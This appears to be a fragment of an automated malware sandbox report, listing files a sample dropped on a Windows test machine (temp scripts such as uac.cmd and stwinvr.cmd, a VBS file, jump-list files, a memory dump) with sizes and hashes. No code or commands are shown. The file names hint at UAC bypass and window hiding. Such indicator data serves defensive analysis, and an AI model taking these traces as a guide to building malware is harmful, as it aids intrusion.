                                                                                                                                                                                                                                                                                                                                              ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\cmdow.txt

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              86KB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              ddd12566b99343b96609afa2524ecec3

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              8fef2c2bc87ef7d135296fdb4cf9ecd9c0322d55

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              767b877e735c425bf05c34683356abfde4070b092f17a4741ea5ac490611f3de

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              b11a36b25b5c34cd86c367c4003f76f360965fdbc67ca1f30afec3a744d419c03d70ade2423ad6a1d2858561f732db9f1d1a279a37b045f8a5faa9c53dbe30bd

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\screen.txt

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              44KB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              a1cd6a64e8f8ad5d4b6c07dc4113c7ec

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              60e2f48a51c061bba72a08f34be781354f87aa49

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              b994ae5cbfb5ad308656e9a8bf7a4a866fdeb9e23699f89f048d7f92e6bb8577

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              87a42901a63793653d49f1c6d410a429cabb470b4c340c4553cbd9eccacb38d8543f85455465e0a432d737e950c590175dad744094861f7c3e575446a65b41e8

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\stwinvr.cmd

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              3c042a03e9614ea74ef10c3995d2b15c

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              3d6ec779ee428119c4bb3bd02d5296b6ff8a49c3

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              472b555044510a66fb3b6bcd152ac8aa60582a7fce6d36e2e91e42bb3a938928

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              d518c9606786fd6c23be216da78fc4c0a2fe33f41a179d8a6f98cf2711f3e018719c9ea3beb62d6d109637bee0d3c0c3b4a954d1cf582ed65f13e8c0e18471f4

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\uac.cmd

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              431B

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              a096f7e33f10234fcb20d9f33e44c456

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              abff898911a9961e492dea122c956084301f7fe1

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              7288eba06f3edd64231fcb8a801107ae6848408d3f5b758b5953399c91d7244b

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              f71c7458096a84281b7e5062b71f0d1957002b375e8a259e57c16ede643fc534fe9046156071a2518221846bad53b33e0255db0ecf2ff3ef24e70bb07bfd456f

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8U2J9X1GVR2B8DUIZ6OG.temp

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              7KB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              3d061941db847ca7e6da19c3e3fb9261

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              7012237cfa6e4eb5ce4fad10e818d6ac069729a9

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              f21840ac88d82c7ce4741f13953261d5f68f5028e8aba2603fa6341f98d9c23d

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              94d6add8fb0743c1833ebb858ee81909bca7303c9e7843f36deceff335436043489fc525c9caa865103495e67674cb54cb76b2b52b83ba2d687ae6208f3d0e48

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GC43T47554WK28NT9Q0K.temp

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              7KB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              58ff10f35477e1e873adaf7f9631d977

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              0f1c97aac78d7b4e453a71ac35430b517b5f15fc

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              b80422bd166bb9dadab6cd14de3e39986c90a5a68d771a50598af1fa4b1ea2bd

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              eb4bd22ff4a9059f9e607e50ec3a8bd6e694b357a9b9a90a31de0b776f804b44aa5ebbfadbab82e16a739beb347d36d59ee8bb091cb40e42f238acc731ffe0b4

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              7KB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              8c4cec801e8dfae918c27a7e4f74539e

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              f16b327bd261ddd8f18ae65d6d2fdfad4e0f51f0

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              5a6ae320419fc07d33332230ea52e1ceb87c87a9a4316ee74fc8c2223e8c26a8

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              0134e88abd0acdc20725e66fe3c898d33de940a0af8cdb1b655b763fe3ef990a2c366ac4af70eecc3158668571b29e479bcaf2db79d9e8ddb1a0be6a739c6638

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              7KB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              abd6f1df73b9d76e4e2c85e47fa9f569

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              90d90b24850702aa8d1a6095a0de67aac14a7501

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              c2843d27da3cc7cfae9e7c2387a7b720e1d39b47fe829cf039712d43058fac50

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              639b87131aedfd7e5f9498645c34408294f07008f493a08d980303a4b7969b0cf34f0c60856ef1d8d89c0040222705f149d6fb5e884158f40c78ea2c6b4202e5

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Public\testvb1.vbs

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              186B

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              de9cf902195071ffc4243727c838ba03

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              d09cb5a1df64460973ff95275faa9a4dd6a80c64

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              5878f152c4f030797757c0579ea8207e27e6c625c0aca481eabb2db5cf73f1af

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              524fa2a36a4925a34183e333400a19f0bc97640feaaf74ed116dd18c5a0bb5582054b3fbe8397c4734f8519fb303a408ff5d07975776d236b19865582c02f72a

                                                                                                                                                                                                                                                                                                                                            • memory/2260-16-0x0000000000400000-0x00000000013B8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              15.7MB